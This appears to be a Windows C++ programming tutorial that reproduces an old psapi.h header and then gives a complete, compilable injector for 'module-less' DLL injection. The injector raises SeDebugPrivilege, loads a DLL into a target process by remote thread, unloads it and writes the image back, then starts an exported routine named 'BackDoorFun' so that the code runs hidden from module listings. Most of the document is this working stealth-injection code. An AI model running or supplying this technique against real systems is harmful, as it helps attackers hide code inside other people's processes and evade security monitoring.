Windows Core Programming with Visual C++, code analysis (63): module-less DLL process injection

Source: Internet
Author: User

Injecting a DLL into another process is a recurring need in information-security programming (instrumentation and API hooking on the defensive side, code execution inside a target on the offensive side).

This article shows how to implement it, and then how to detach the injected DLL from the loader's module list so that it keeps running without appearing as a loaded module.

You need to link against Psapi.lib. It ships with the Windows SDK / Platform SDK, so take it from there rather than from a copy found through a web search: a library downloaded from an arbitrary site is untrusted code that gets linked straight into your tool. Note that the listing below includes psapi.h but only calls the Toolhelp32 snapshot API (CreateToolhelp32Snapshot / Module32First / Module32Next from tlhelp32.h); the PSAPI dependency is only needed if you switch the module lookup to EnumProcessModules.

The psapi.h header (an early Platform SDK copy, dated 1994 in its own banner) is reproduced below:

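/*++

Module Name:

    psapi.h

Abstract:

    Include file for APIs provided by PSAPI.DLL

Author:

    Richard Shupak   [richards]  06-Jan-1994

Revision History:

--*/

#ifndef _PSAPI_H_
#define _PSAPI_H_

#ifdef __cplusplus
extern "C" {
#endif

/*
 * NOTE(review): this is the 32-bit era copy of the header.  All sizes and
 * counters are declared DWORD here; the current Windows SDK declares the
 * PROCESS_MEMORY_COUNTERS byte counters as SIZE_T.  Do not pair this copy
 * with a 64-bit build of psapi.lib -- confirm against the SDK you link.
 *
 * All per-process functions take a HANDLE obtained by the caller; they do
 * no access checking of their own beyond what the handle's access mask allows.
 */

/* Fill lpidProcess (cb bytes) with process IDs; *cbNeeded receives the bytes written. */
BOOL
WINAPI
EnumProcesses(
    DWORD * lpidProcess,
    DWORD   cb,
    DWORD * cbNeeded
    );

/* Fill lphModule (cb bytes) with the module handles loaded in hProcess. */
BOOL
WINAPI
EnumProcessModules(
    HANDLE hProcess,
    HMODULE *lphModule,
    DWORD cb,
    LPDWORD lpcbNeeded
    );

/* Base file name (no directory) of hModule inside hProcess; returns characters copied. */
DWORD
WINAPI
GetModuleBaseNameA(
    HANDLE hProcess,
    HMODULE hModule,
    LPSTR lpBaseName,
    DWORD nSize
    );

DWORD
WINAPI
GetModuleBaseNameW(
    HANDLE hProcess,
    HMODULE hModule,
    LPWSTR lpBaseName,
    DWORD nSize
    );

#ifdef UNICODE
#define GetModuleBaseName  GetModuleBaseNameW
#else
#define GetModuleBaseName  GetModuleBaseNameA
#endif // !UNICODE

/* Full path of hModule inside hProcess; returns characters copied. */
DWORD
WINAPI
GetModuleFileNameExA(
    HANDLE hProcess,
    HMODULE hModule,
    LPSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetModuleFileNameExW(
    HANDLE hProcess,
    HMODULE hModule,
    LPWSTR lpFilename,
    DWORD nSize
    );

#ifdef UNICODE
#define GetModuleFileNameEx  GetModuleFileNameExW
#else
#define GetModuleFileNameEx  GetModuleFileNameExA
#endif // !UNICODE

/* Load address, mapped size and entry point of one module. */
typedef struct _MODULEINFO {
    LPVOID lpBaseOfDll;
    DWORD SizeOfImage;
    LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;

/* Fill lpmodinfo (cb bytes, normally sizeof(MODULEINFO)) for hModule in hProcess. */
BOOL
WINAPI
GetModuleInformation(
    HANDLE hProcess,
    HMODULE hModule,
    LPMODULEINFO lpmodinfo,
    DWORD cb
    );

/* Trim the working set of hProcess to the minimum. */
BOOL
WINAPI
EmptyWorkingSet(
    HANDLE hProcess
    );

/* Copy working-set page information for hProcess into pv (cb bytes). */
BOOL
WINAPI
QueryWorkingSet(
    HANDLE hProcess,
    PVOID pv,
    DWORD cb
    );

/* Turn on working-set change tracking; required before GetWsChanges. */
BOOL
WINAPI
InitializeProcessForWsWatch(
    HANDLE hProcess
    );

/* One recorded page fault: the faulting instruction and the address it touched. */
typedef struct _PSAPI_WS_WATCH_INFORMATION {
    LPVOID FaultingPc;
    LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;

/* Drain recorded page faults into lpWatchInfo (cb bytes). */
BOOL
WINAPI
GetWsChanges(
    HANDLE hProcess,
    PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
    DWORD cb
    );

/* Name of the file backing the memory at lpv in hProcess; returns characters copied. */
DWORD
WINAPI
GetMappedFileNameW(
    HANDLE hProcess,
    LPVOID lpv,
    LPWSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetMappedFileNameA(
    HANDLE hProcess,
    LPVOID lpv,
    LPSTR lpFilename,
    DWORD nSize
    );

/*
 * FIX: the original header mapped GetMappedFilenameEx to GetMappedFilenameExW/A,
 * names that are declared nowhere in this file, so any caller using the generic
 * macro failed to link.  The generic name now resolves to the functions that are
 * actually declared above; the misspelled name is kept as an alias so existing
 * source keeps compiling.
 */
#ifdef UNICODE
#define GetMappedFileName  GetMappedFileNameW
#else
#define GetMappedFileName  GetMappedFileNameA
#endif // !UNICODE
#define GetMappedFilenameEx  GetMappedFileName

/* Fill lpImageBase (cb bytes) with the load addresses of kernel-mode drivers. */
BOOL
WINAPI
EnumDeviceDrivers(
    LPVOID *lpImageBase,
    DWORD cb,
    LPDWORD lpcbNeeded
    );

/* Base file name of the driver loaded at ImageBase; returns characters copied. */
DWORD
WINAPI
GetDeviceDriverBaseNameA(
    LPVOID ImageBase,
    LPSTR lpBaseName,
    DWORD nSize
    );

DWORD
WINAPI
GetDeviceDriverBaseNameW(
    LPVOID ImageBase,
    LPWSTR lpBaseName,
    DWORD nSize
    );

#ifdef UNICODE
#define GetDeviceDriverBaseName  GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName  GetDeviceDriverBaseNameA
#endif // !UNICODE

/* Full path of the driver loaded at ImageBase; returns characters copied. */
DWORD
WINAPI
GetDeviceDriverFileNameA(
    LPVOID ImageBase,
    LPSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetDeviceDriverFileNameW(
    LPVOID ImageBase,
    LPWSTR lpFilename,
    DWORD nSize
    );

#ifdef UNICODE
#define GetDeviceDriverFileName  GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName  GetDeviceDriverFileNameA
#endif // !UNICODE

// Structure for GetProcessMemoryInfo().  cb must be set to sizeof(*this) by the caller.
typedef struct _PROCESS_MEMORY_COUNTERS {
    DWORD cb;
    DWORD PageFaultCount;
    DWORD PeakWorkingSetSize;
    DWORD WorkingSetSize;
    DWORD QuotaPeakPagedPoolUsage;
    DWORD QuotaPagedPoolUsage;
    DWORD QuotaPeakNonPagedPoolUsage;
    DWORD QuotaNonPagedPoolUsage;
    DWORD PagefileUsage;
    DWORD PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;

typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;

/* Fill ppsmemCounters (cb bytes) with the memory counters of Process. */
BOOL
WINAPI
GetProcessMemoryInfo(
    HANDLE Process,
    PPROCESS_MEMORY_COUNTERS ppsmemCounters,
    DWORD cb
    );

#ifdef __cplusplus
}
#endif

#endif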

 

The module-less DLL injection code follows, with the analysis in the comments. The idea: load the DLL normally with a remote LoadLibraryA call, copy the mapped image out of the target, unload it with FreeLibrary, write the copy back to the same base address it was relocated for, and start a remote thread on one of its exported routines — the code keeps running, but the DLL is no longer in the process's module list:

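#include "stdafx.h"
#include "windows.h"
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "psapi.h"
#include "tlhelp32.h"

/*
 * Module-less DLL injection.
 *
 * Flow: inject DLL.DLL into the target with the classic
 * CreateRemoteThread(LoadLibraryA) trick, copy the mapped image out of the
 * target, FreeLibrary it, re-allocate the same address range, write the image
 * bytes back, and start a thread at an exported routine inside the copy.
 * Because the copy lands at the base the loader relocated it for, its
 * relocations and resolved imports stay valid, but the loader no longer knows
 * about it, so the Toolhelp module enumeration used below (and PSAPI's
 * EnumProcessModules) should no longer list it.
 *
 * Caveats (review):
 *  - Injector and target must have the same bitness: LoadLibraryA and
 *    FreeLibrary are resolved in *this* process and assumed to sit at the same
 *    address in the target, which holds for same-bitness processes because
 *    kernel32 is mapped at one base per boot.
 *  - Nothing will ever call DllMain for the copy, and anything that relies on
 *    the loader (TLS, delay-load imports, x64 exception unwind lookup) may not
 *    work inside it -- confirm for the DLL being injected.
 *  - The result is a private, executable, non-image-backed region in the
 *    target, which is exactly what memory scanners and EDR flag.  Use only on
 *    systems you are authorised to test.
 */

// Locate the module whose full path equals DllFullName in process ProcessID and
// return its MODULEENTRY32 (modBaseAddr, modBaseSize) through Thread.
// Returns false if the snapshot cannot be taken or the module is not loaded.
// Fixes vs. original: CreateToolhelp32Snapshot reports failure with
// INVALID_HANDLE_VALUE (not NULL); the snapshot handle was never closed; a
// case-sensitive strcmp was used on a Windows path; a missing module was
// reported by re-comparing whatever the last entry happened to be.
bool GetThreadInformation(DWORD ProcessID, char* DllFullName, MODULEENTRY32& Thread)
{
    HANDLE hthSnapshot;
    // Documented transient failure while the target is loading modules: retry.
    do
    {
        hthSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcessID);
    } while (hthSnapshot == INVALID_HANDLE_VALUE && ::GetLastError() == ERROR_BAD_LENGTH);
    if (hthSnapshot == INVALID_HANDLE_VALUE)
        return false;

    bool found = false;
    Thread.dwSize = sizeof(Thread);   // required before Module32First
    for (BOOL more = ::Module32First(hthSnapshot, &Thread); more; more = ::Module32Next(hthSnapshot, &Thread))
    {
        // szExePath is the path as the loader recorded it; its casing need not
        // match ours, and Windows paths are case-insensitive.
        if (_stricmp(Thread.szExePath, DllFullName) == 0)
        {
            found = true;
            break;
        }
    }

    ::CloseHandle(hthSnapshot);
    return found;
}

// Enable lpPrivilegeName (e.g. SE_DEBUG_NAME) in the access token of hProcess.
// To raise this injector's own privileges pass GetCurrentProcess(); passing the
// target's handle (as the original main did) adjusts the wrong token.
// Returns false if the token cannot be opened, the privilege name is unknown,
// or the privilege is not held by the token.  AdjustTokenPrivileges returns
// TRUE even when it assigned nothing, so GetLastError() must be inspected.
// Also closes the token handle, which the original leaked.
bool AdjustPrivileges(HANDLE hProcess, LPCTSTR lpPrivilegeName)
{
    HANDLE hToken = NULL;
    if (!::OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return false;

    bool ok = false;
    TOKEN_PRIVILEGES tkp = { 0 };
    if (::LookupPrivilegeValue(NULL, lpPrivilegeName, &tkp.Privileges[0].Luid))
    {
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        if (::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0))
            ok = (::GetLastError() != ERROR_NOT_ALL_ASSIGNED);
    }

    ::CloseHandle(hToken);
    return ok;
}

// Load DllFullName into hProcess by running LoadLibraryA on a remote thread.
// hProcess needs PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ.
// Blocks until the remote LoadLibraryA returns, so on success the module is
// mapped when this function returns (the original fired the thread and came
// back immediately, leaving the caller to Sleep() and hope).
// Returns false on any API failure or if LoadLibraryA returned NULL.
// Fixes vs. original: the path string was allocated PAGE_EXECUTE_READWRITE and
// never freed; the thread handle was leaked; the load result was never checked.
bool InjectRemoteProcess(HANDLE hProcess, char* DllFullName)
{
    SIZE_T pathBytes = strlen(DllFullName) + 1;

    // The path only has to be readable by the remote LoadLibraryA.
    PSTR pDllName = (PSTR)::VirtualAllocEx(hProcess, NULL, pathBytes, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pDllName == NULL)
        return false;

    bool ok = false;
    SIZE_T written = 0;
    if (::WriteProcessMemory(hProcess, pDllName, DllFullName, pathBytes, &written) && written == pathBytes)
    {
        // Resolved in our own process; valid in the target only if both have
        // the same bitness (see file header).
        PTHREAD_START_ROUTINE pfnThreadRtn =
            (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
        if (pfnThreadRtn != NULL)
        {
            HANDLE hRemoteThread = ::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pDllName, 0, NULL);
            if (hRemoteThread != NULL)
            {
                ::WaitForSingleObject(hRemoteThread, INFINITE);
                // LoadLibraryA's HMODULE result (low 32 bits on x64) is the
                // thread exit code; zero means the load failed.
                DWORD exitCode = 0;
                if (::GetExitCodeThread(hRemoteThread, &exitCode))
                    ok = (exitCode != 0);
                ::CloseHandle(hRemoteThread);
            }
        }
    }

    // The path is no longer referenced once LoadLibraryA has returned.
    ::VirtualFreeEx(hProcess, pDllName, 0, MEM_RELEASE);
    return ok;
}

// Run FreeLibrary(Address) on a remote thread in hProcess and wait for it.
// FreeLibrary only decrements the module's reference count: if the DLL was
// already mapped in the target before injection, the image stays mapped and
// the caller's VirtualAllocEx at its base address will then fail.
// Returns false on API failure or if the remote FreeLibrary returned FALSE
// (the original ignored FreeLibrary's result).
bool UnistallDll(HANDLE hProcess, BYTE* Address)
{
    PTHREAD_START_ROUTINE pfnThreadRtn =
        (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandleA("kernel32.dll"), "FreeLibrary");
    if (pfnThreadRtn == NULL)
        return false;

    HANDLE hThread = ::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, Address, 0, NULL);
    if (hThread == NULL)
        return false;

    ::WaitForSingleObject(hThread, INFINITE);

    // FreeLibrary's BOOL result is the thread exit code.
    DWORD exitCode = 0;
    bool ok = ::GetExitCodeThread(hThread, &exitCode) && exitCode != 0;
    ::CloseHandle(hThread);
    return ok;
}

#define PID 3844            // default target process; overridden by argv[1]
#define BackDoorFun 0x1014  // RVA of the exported routine started inside the module-less copy

// Inject DllFullName into hRemoteProcess (pid), detach the image from the
// loader and start BackDoorFun in the detached copy.  Prints the failing step
// and returns false on error; releases the image buffer and thread handle on
// every path (the original leaked both).
static bool InjectWithoutModule(HANDLE hRemoteProcess, DWORD pid, char* DllFullName)
{
    bool ok = false;
    char* Buffer = NULL;
    HANDLE hNewThread = NULL;
    MODULEENTRY32 Thread;
    SIZE_T Read, Written;
    LPVOID Alloc;

    // 1. Classic LoadLibraryA injection; returns only after the remote load completed.
    if (!InjectRemoteProcess(hRemoteProcess, DllFullName))
    {
        printf("inject faile!!\n");
        goto cleanup;
    }

    // 2. Find where the loader mapped it (base address and SizeOfImage).
    Thread.dwSize = sizeof(Thread);
    if (!GetThreadInformation(pid, DllFullName, Thread))
    {
        printf("Get RemoteTheadAddress faile!!\n");
        goto cleanup;
    }

    // 3. Copy the whole mapped image out.  Relocations and the import table
    //    have already been fixed up for this base, so the bytes stay usable as
    //    long as they go back to exactly the same address.  A short read means
    //    part of the image is not readable; do not continue with a torn copy.
    Buffer = new char[Thread.modBaseSize];
    Read = 0;
    if (!::ReadProcessMemory(hRemoteProcess, Thread.modBaseAddr, Buffer, Thread.modBaseSize, &Read)
        || Read != Thread.modBaseSize)
    {
        printf("ReadProcessMemory faile!!\n");
        goto cleanup;
    }

    // 4. Unmap the real module so the range becomes free.  DLL_PROCESS_DETACH
    //    runs on the original here; the copy reflects the state before that.
    if (!UnistallDll(hRemoteProcess, Thread.modBaseAddr))
    {
        printf("Unistall DLL faile!!!\n");
        goto cleanup;
    }

    // 5. Re-allocate exactly the same range.  Fails if FreeLibrary did not
    //    really unmap (reference count > 1) or another thread took the range.
    //    RWX because code and data are written back together; applying the
    //    section protections with VirtualProtectEx afterwards would be the
    //    least-privilege improvement.
    Alloc = ::VirtualAllocEx(hRemoteProcess, Thread.modBaseAddr, Thread.modBaseSize,
                             MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Alloc == NULL)
    {
        printf("VirtualAllocEx failed!!\n");
        goto cleanup;
    }

    Written = 0;
    if (!::WriteProcessMemory(hRemoteProcess, Thread.modBaseAddr, Buffer, Thread.modBaseSize, &Written)
        || Written != Thread.modBaseSize)
    {
        printf("WriteProcessMemory failed!!\n");
        goto cleanup;
    }

    // 6. Start the exported routine directly at base + RVA.  lpParameter is
    //    NULL because the routine takes no arguments; if it did, write a struct
    //    into the target with VirtualAllocEx/WriteProcessMemory (as the path
    //    string was) and pass its remote address here.
    hNewThread = ::CreateRemoteThread(hRemoteProcess, NULL, 0,
                                      (PTHREAD_START_ROUTINE)(Thread.modBaseAddr + BackDoorFun),
                                      NULL, 0, NULL);
    if (hNewThread == NULL)
    {
        printf("CreateNewThread faile!!\n");
        goto cleanup;
    }
    ok = true;

cleanup:
    if (hNewThread != NULL)
        ::CloseHandle(hNewThread);
    delete[] Buffer;   // delete[] NULL is a no-op
    return ok;
}

// Usage: <injector> [pid]   (pid defaults to PID).
// Exit code 0 on success, 1 on any failure (the original returned 0 for both).
// BackDoorFun is an RVA read off the DLL's export table by hand; it must be
// regenerated whenever DLL.DLL is rebuilt, and the routine must have the
// LPTHREAD_START_ROUTINE shape (DWORD WINAPI fn(LPVOID)) because it is started
// directly with CreateRemoteThread.
int main(int argc, char* argv[])
{
    DWORD pid = PID;
    if (argc > 1)
    {
        char* end = NULL;
        unsigned long v = strtoul(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || v == 0)
        {
            printf("bad pid: %s\n", argv[1]);
            return 1;
        }
        pid = (DWORD)v;
    }

    // Full path of the DLL to inject: <current directory>\DLL.DLL.  The length
    // is checked before the copy; the original strcat'ed into 255 bytes and
    // ignored GetCurrentDirectory's return value (0 on failure, required size
    // when the buffer is too small).
    const char* DllName = "DLL.DLL";
    char DllFullName[MAX_PATH];
    DWORD cwdLen = ::GetCurrentDirectoryA(MAX_PATH, DllFullName);
    if (cwdLen == 0 || cwdLen + 1 + strlen(DllName) >= MAX_PATH)
    {
        printf("GetCurrentDirectory faile or DLL path too long!!\n");
        return 1;
    }
    strcat(DllFullName, "\\");
    strcat(DllFullName, DllName);

    // SeDebugPrivilege has to be enabled in *our* token before OpenProcess or it
    // plays no part in the access check.  The original enabled it on the
    // target's token, and only after the handle had already been obtained.
    if (!AdjustPrivileges(::GetCurrentProcess(), SE_DEBUG_NAME))
    {
        printf("Adjust process privileges faile!!\n");
        return 1;
    }

    // Request only the rights the injection needs instead of PROCESS_ALL_ACCESS.
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    HANDLE hRemoteProcess = ::OpenProcess(access, FALSE, pid);
    if (hRemoteProcess == NULL)
    {
        printf("OpenProcess faile!!");
        return 1;
    }

    bool ok = InjectWithoutModule(hRemoteProcess, pid, DllFullName);
    ::CloseHandle(hRemoteProcess);
    return ok ? 0 : 1;
}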

 
